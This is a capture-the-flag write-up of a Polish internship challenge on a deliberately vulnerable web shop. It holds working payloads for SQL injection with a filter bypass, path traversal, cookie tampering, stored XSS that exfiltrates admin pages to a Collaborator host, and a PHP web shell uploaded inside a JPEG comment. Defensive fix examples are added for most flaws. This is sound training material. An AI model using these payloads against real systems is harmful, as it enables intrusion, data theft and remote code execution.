Sekurak Próba 5 Tygodni Challenge
Writeup for Próba 5 Tygodni Challenge From Sekurak Hacker Adept Internship
Challenge Description
The task was to obtain 10 hidden flags on a vulnerable website. The flag format is:
flag{proba5tygodniSOME_TEXT_OR_NUMBERS_HERE}
Let’s get started!
Flag 1
The first thing I did was check the source code of the page with CTRL + U.
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Not Vulnerable WebShop</title>
<link rel="stylesheet" href="css/style.css">
<link rel="robots" href="robots.txt">
<script src="https://www.google.com/recaptcha/enterprise.js?render=6Lcq-bkpAAAAAIYqSYnAmq9J0Rs3CfqpDf1l4XVc" type="ffdf2ff9ce94e2563c9254e6-text/javascript"></script>
</head>
<body>
<nav>
<ul>
<li><a href="./?page=home">Strona główna</a></li>
<li><a href="./?page=login">Logowanie</a></li>
<li><a href="./?page=register">Rejestracja</a></li>
<li><a href="./?page=products">Katalog produktów</a></li>
<li><a href="./?page=cart">Koszyk</a></li>
<li><a href="./?page=contact">Kontakt</a></li>
</ul>
</nav>
<div class="container">
<section>
<h2>Witaj w Not Vulnerable WebShop!</h2>
<p>Nasz sklep oferuje bezpieczne produkty, takie jak bezpieczny kubek bez dziur.</p>
<br>
<h2>Informacja dla uczestników stażu...</h2>
<p>Programy automatyzujące prace są zakazane podobnie jak w etapie pierwszym, nie banujemy za ich używanie, za to bardzo utrudniamy ich użycie!</p>
<p>Cała strona jest za CloudFlare, narzucony jest Rate Limitting, dodatkowo istotne funkcjonalności posiadają Captche, bye bye automatic scanner.</p>
<hr>
<button id="generateFlagButton">Wygeneruj flagę do agregatora</button>
<script type="ffdf2ff9ce94e2563c9254e6-text/javascript">
document.getElementById('generateFlagButton').addEventListener('click', function() {
document.location.href = './agregator.php';
});
</script>
</section>
</div>
<footer>
<p>© 2024 Not Vulnerable WebShop. All rights reserved.</p>
<p>Głodny? Lodówka jest <a href="./lodowka.html" style="color: #fff; text-decoration: none;">tutaj</a></p>
</footer><script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="ffdf2ff9ce94e2563c9254e6-|49" defer></script></body>
</html>
We immediately see there’s a robots.txt file. Let’s check it out. It’s always one of the first things I do during a pentest.
User-agent: *
Disallow: /
# Fajnie, ze ktos tu zaglada - flaga: flag{proba5tygodni[1][PlikiRobotsTezSaWazne]}
The first flag is ours!
flag{proba5tygodni[1][PlikiRobotsTezSaWazne]}
Flag 2
After finding the first flag and looking at the source code, I went straight to the product catalog which showed me the product page.
After clicking “Details,” we see the URL:
https://proba5tygodni.safety-online.pl/?page=product_details&id=1
So immediately, I thought about enumerating IDs like 1, 2, 3, and so on. On ID 7, I found something interesting.
flag{proba5tygodni[2][DobrePaginacjeNigdyNieSaZle]}
Flag 3
Next, I wanted to check the login functionality. After trying some SQL injection payloads, I noticed that during login, you can check the “Remember me” checkbox. When we create an account and log in with it, we get a value like:
I thought that maybe if I changed it to some arbitrary value like 0 or 1, it could get me admin access. And it did! After changing the remember cookie to the value 1, I got this:
flag{proba5tygodni[3][AdminToDobryZiomLogujemySie]}
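As an added example (not code from the challenge or the writeup), here is how a "remember me" cookie can bind the user id to an HMAC so that rewriting the id to 1, as done above, is rejected. The cookie layout and the secret are assumptions of this example.

```python
# Added example, not code from the writeup: a "remember me" cookie whose user id
# is bound to an HMAC, so rewriting the id to 1 (as done above) is rejected.
import base64
import hashlib
import hmac
import time
from typing import Optional

# Constructed demo secret; a real deployment loads it from configuration.
SECRET_KEY = b"constructed-demo-secret-do-not-reuse"

def _sign(payload: bytes) -> str:
    sig = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(sig).decode().rstrip("=")

def make_remember_cookie(user_id: int, ttl_seconds: int = 30 * 86400,
                         now: Optional[int] = None) -> str:
    """Return '<user_id>.<expiry>.<signature>'; the signature covers both fields."""
    now = int(time.time()) if now is None else now
    payload = f"{user_id}.{now + ttl_seconds}"
    return f"{payload}.{_sign(payload.encode())}"

def verify_remember_cookie(cookie: str, now: Optional[int] = None) -> Optional[int]:
    """Return the user id if the cookie is untampered and unexpired, else None."""
    now = int(time.time()) if now is None else now
    parts = cookie.split(".")
    if len(parts) != 3:
        return None
    user_id, expiry, given = parts
    if not (user_id.isdigit() and expiry.isdigit()) or int(expiry) < now:
        return None
    expected = _sign(f"{user_id}.{expiry}".encode())
    # Constant-time compare so the tag cannot be forged byte by byte.
    if not hmac.compare_digest(expected.encode(), given.encode()):
        return None
    return int(user_id)
```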
Flag 4
Now that we have access to the admin panel, we can check for more interesting things. Let’s take a look at the File Manager functionality.
We can view .txt files with it, but .php files are not allowed. Here is an example path:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/dokument1.txt
Curious eyes can immediately spot a potential place for path traversal. So did I. After changing the URL to:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/..
we got this:
After searching for some interesting files, I found this one:
https://proba5tygodni.safety-online.pl/?page=panel&option=manager&path=/data/../files/dluga_nazwa_pliku_z_sekretem.txt
And there it is:
flag{proba5tygodni[4][PathTraversalBywaNaprawdeOkej]}
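As an added example (not the challenge's own code), this is how the file manager's path parameter should be resolved so that /data/.. or /data/../files/... cannot leave the data directory. The application root and the data/ subdirectory are assumptions of this example.

```python
# Added example, not the challenge's code: resolve the "path" parameter so that
# "/data/.." and "/data/../files/..." are rejected. app_root is an assumed location.
import os
from typing import Optional

ALLOWED_SUFFIXES = (".txt",)

def resolve_manager_path(app_root: str, requested: str) -> Optional[str]:
    """Return the absolute file path to serve, or None if the request is rejected."""
    data_dir = os.path.realpath(os.path.join(app_root, "data"))
    # Never let the client value be joined as an absolute path.
    candidate = os.path.realpath(os.path.join(app_root, requested.lstrip("/\\")))
    # The resolved path must be strictly inside data_dir; a plain string-prefix
    # test would also accept a sibling directory such as "data2".
    if os.path.commonpath([data_dir, candidate]) != data_dir:
        return None
    if candidate == data_dir or not candidate.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return candidate
```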
Flag 5
While checking the possible directories and files, I saw a pages directory with a file called confidential.php. I tried to go directly to that file via the URL: https://proba5tygodni.safety-online.pl/?page=confidential
But I got this:
That’s interesting. So let’s try to craft one like privileged=true and send the request using Burp.
After sending the request, we got:
flag{proba5tygodni[5][LFIPlusCiastkaTakaNowosc]}
Flag 6
Back in the admin panel, we have the Users page with a search input for showing a specific user. The first thing to try is some SQL injection. Let’s start with '.
Ok, we know something based on the error message. We need to close two parentheses and then comment out the rest. Let’s try '))#. Ok, we got no error, so I think it works. Now let’s check the number of columns using ORDER BY. Our payload will look like ')) ORDER BY 1#. With ')) ORDER BY 6#, I got an error, which means there are five columns selected.
Now we need to use UNION to retrieve some data. So we can try: ')) UNION SELECT 1,2,3,4,5#
But we get an error message:
You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near '1,2,3,4,5#%' AND password IS NOT NULL) AND 1=1)' at line 1
So it looks like the SELECT keyword is being cut out. After trying some bypasses, this one worked: ')) UNION SELSELECTECT 1,2,3,4,5#. The ‘inner’ SELECT is removed in a single pass, and the remaining pieces concatenate to form ‘SELECT’ again.
This payload gave me table names:
')) UNION SELSELECTECT table_name, 2, 3, 4, 5 FROM information_schema.tables#
There are tables like products and accounts, but one is called confidential_data, which is interesting.
' )) UNION SELSELECTECT column_name,2,3,4,5 FROM information_schema.columns WHERE table_name='confidential_data'#
The column name is flag, so now it’s just a formality to do the rest.
')) UNION SELSELECTECT flag,2,3,4,5 FROM confidential_data#
And there’s our flag:
flag{proba5tygodni[6][SQLPonownieCiePowital!]}
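As an added example (not the challenge's code), the following models why the one-pass SELECT filter that the SELSELECTECT payload slipped past is not a defence, and shows the parameterised query that is. The table layout is constructed; only the filter behaviour and the query shape visible in the MariaDB error are taken from the page.

```python
# Added example, not the challenge's code: a single-pass keyword filter is not
# idempotent, so "SELSELECTECT" collapses to "SELECT"; a bound parameter is.
import re
import sqlite3

def strip_select_once(value: str) -> str:
    """Models the app's filter: delete 'SELECT' in one, non-recursive pass."""
    return re.sub(r"select", "", value, flags=re.IGNORECASE)

def vulnerable_query(search: str) -> str:
    """String-built query in the shape the MariaDB error on the page reveals."""
    return ("SELECT id, login, email, role, created FROM accounts WHERE "
            f"((login LIKE '{strip_select_once(search)}%' AND password IS NOT NULL) AND 1=1)")

def demo_db() -> sqlite3.Connection:
    # Constructed in-memory schema standing in for the shop's accounts table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (id INTEGER, login TEXT, password TEXT)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?, ?)",
                     [(1, "admin", "x"), (2, "adam", "y")])
    return conn

def search_accounts(conn: sqlite3.Connection, search: str) -> list:
    """Bound parameter: whatever the client sends is data, never SQL."""
    cur = conn.execute("SELECT id, login FROM accounts WHERE login LIKE ?",
                       (search + "%",))
    return cur.fetchall()
```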
Flag 7
In our application, we can buy things, and there’s a standard e-commerce cart process. During a few tests of placing an order, I intercepted the /?page=order&action=process POST request, which has the following body: order[2][quantity]=1. This made me wonder whether I could change the numbers to lower the price or even place a free order, and indeed I could.
Notice the 0 there. In the response, we can see:
flag{proba5tygodni[7][DarmoweZakupyLubieJe.!]}
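As an added example (not the shop's code), this is the server-side check the order endpoint was missing: the order[<id>][quantity] body is parsed, zero and negative quantities are rejected, and the total is priced from a catalogue the client cannot touch. The catalogue and the quantity limit are constructed for the example.

```python
# Added example, not the shop's code: validate "order[<id>][quantity]=<n>" and
# price it from a server-side catalogue (prices in grosze, constructed).
import re
from typing import Optional
from urllib.parse import parse_qsl

CATALOG = {1: 1999, 2: 4900, 7: 500}          # constructed: product id -> price
ORDER_FIELD = re.compile(r"^order\[(\d+)\]\[quantity\]$")
MAX_QTY = 100

def price_order(body: str) -> Optional[int]:
    """Return the order total in grosze, or None if any field is invalid."""
    items: dict = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        m = ORDER_FIELD.match(key)
        if not m:                       # e.g. a client-supplied price field
            return None
        product_id = int(m.group(1))
        if product_id not in CATALOG or not value.isdigit():
            return None                 # unknown product, "-1", "1.5", ""
        qty = int(value)
        if not 1 <= qty <= MAX_QTY:     # rejects the 0 used above
            return None
        items[product_id] = items.get(product_id, 0) + qty
    if not items:
        return None
    return sum(CATALOG[pid] * qty for pid, qty in items.items())
```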
Flag 8
The page also has a contact form where we can send a message to the website administrator. We are then notified that the admin will review our message. So we have stored XSS. When I sent <script>prompt(1)</script>, I noticed a significant delay in the response, which I think confirms the XSS.
I crafted a payload using my Burp Collaborator:
<img src="x" onerror="this.src='https://COLLABORATOR?html='+encodeURIComponent(document.documentElement.innerHTML);this.onerror=null;">
In the response, I got the URL-encoded HTML of a web page which, after decoding, looks like this:
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Panel Administratora</title>
<style>footer,header{background-color:#333;color:#fff}footer,header,nav{padding:10px;text-align:center}body{font-family:Arial,sans-serif;margin:0;padding:0}nav{background-color:#f4f4f4}nav a{text-decoration:none;color:#333;margin:0 10px}nav a:hover{text-decoration:underline}footer{position:fixed;bottom:0;width:100%}</style>
</head>
<body>
<header>
<h1>Panel Administratora</h1>
</header>
<nav>
<a href="./" class="active">Panel</a>
<a href="./?page=add_new_admin">Dodaj nowego administratora</a>
<a href="#">Wyloguj</a>
</nav>
<main>
<section>
<h2>Ostatnia wiadomość do administratora</h2>
<!-- Tutaj umieść treść ostatniej wiadomości -->
<p>Pytanie użytkownika: <img src="x" onerror="this.src='https://COLLABORATOR?html=' encodeURIComponent(document.documentElement.innerHTML);this.onerror=null;"> <br></p></section>
</main>
<footer>
(C) Not Vulnerable WebShop Secret Admin Panel
</footer>
</body>
So we have an endpoint /?page=add_new_admin. I tried to access it directly with my browser, tried setting Host: localhost, etc., but nothing worked. So I thought I needed to use the XSS to actually load that page and then send the result back to me. Let’s use the collaborator again with some simple JavaScript:
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = () => {
    if (xhr.readyState == XMLHttpRequest.DONE) {
        var xhr_exfil = new XMLHttpRequest();
        xhr_exfil.open('POST', "https://COLLABORATOR", false);
        xhr_exfil.send(xhr.response);
    }
};
xhr.open('GET', "/niedostepny_zzewnatrz123ojnie/?page=add_new_admin", false);
xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
xhr.send();
</script>
And the collaborator received this request:
flag{proba5tygodni[8][BoBlindXSSToNieTylkoCzytanie]}
Flag 9
When we look at the products page while logged in as an admin, we see that we can edit them.
After clicking the link, we get another flag for free.
flag{proba5tygodni[9][NaAdminieTezWartoSprawdzacInnePodstrony]}
Flag 10
We can edit our profile by uploading an avatar.
But the web app is not properly checking the uploaded file, because we can upload, for example, a JPEG with PHP code in its comment section. We can do it via exiftool like this:
exiftool -Comment="<?php system($_GET['cmd']); ?>"
Then we intercept the upload request, change the filename to test.php, change the Content-Type to image/jpeg, and forward it.
As a response, we get the last flag:
flag{proba5tygodni[10][WebShellNiejestMiObcy]}
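As an added example (not the shop's code), here are the avatar upload checks that the trick above would have to get past: the extension, the declared Content-Type and the real magic bytes must agree, the stored name is generated server side so test.php never reaches disk, and PHP tags embedded in metadata are refused. The allowed formats and the name scheme are assumptions of this example.

```python
# Added example, not the shop's code: avatar upload validation against the
# "PHP in a JPEG comment, renamed to .php" trick described above.
import os
import secrets
from typing import Optional, Tuple

MAGIC = {b"\xff\xd8\xff": "jpg", b"\x89PNG\r\n\x1a\n": "png"}
EXT_TO_KIND = {"jpg": "jpg", "jpeg": "jpg", "png": "png"}
KIND_TO_MIME = {"jpg": "image/jpeg", "png": "image/png"}

def validate_avatar(filename: str, content_type: str,
                    data: bytes) -> Tuple[Optional[str], str]:
    """Return (storage_name, "ok") or (None, reason). The storage name never
    derives from the client filename, so 'test.php' cannot land in the web root."""
    ext = os.path.splitext(filename)[1].lower().lstrip(".")
    kind_from_ext = EXT_TO_KIND.get(ext)
    if kind_from_ext is None:
        return None, "extension not allowed"
    kind = next((k for magic, k in MAGIC.items() if data.startswith(magic)), None)
    if kind is None:
        return None, "not an image"
    # Extension, Content-Type and real content must all agree.
    if kind != kind_from_ext or content_type != KIND_TO_MIME[kind]:
        return None, "type mismatch"
    # Defence in depth: image metadata can carry arbitrary text, so refuse
    # PHP tags outright instead of trusting that the interpreter is never reached.
    if b"<?php" in data.lower() or b"<?=" in data:
        return None, "embedded PHP tag"
    return f"{secrets.token_hex(16)}.{kind}", "ok"
```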